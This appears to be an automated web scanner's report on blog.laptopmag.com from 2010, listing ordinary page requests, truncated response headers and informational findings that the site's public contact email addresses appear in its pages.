HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-8b3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /bestdeals.aspx HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:11:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /deal-of-the-day-get-a-hp-pavilion-dm4-fo-629 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:56 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUt>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /deal-of-the-day-lenovo-g460-for-579 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:45 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fWV>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65516
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email addresses were disclosed in the response:
helpme@laptopmag.com
tips@bedfordmags.com
Request
GET /help-me-laptop-international-business-traveller-seeking-a-productivity-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fP3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<hea ...[SNIP]... and right up Sasha’s alley. She’s the director of an international non-profit that’s based in London, but she lives in Australia with her three-year-old. She recently wrote to us at helpme@laptopmag.com seeking advice on her next laptop purchase because her current Toshiba Portege R500 is about to die.</p> ...[SNIP]... <a href="http://www.laptopmag.com/l/helpme@laptopmag.com">helpme@laptopmag.com</a> ...[SNIP]... <a href="mailto:tips@bedfordmags.com"> ...[SNIP]...
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /how-to-buy-headphones-as-a-gift HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:44 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUv>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /is-this-the-nexus-s HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:38 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fXn>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /macbook-air-hands-on HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fnc>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /sony-whittles-their-vaio-y-series-to-11-6-inches HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:53 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUN>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /top-laptops-of-october-2010 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fDB>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:34 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fug>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">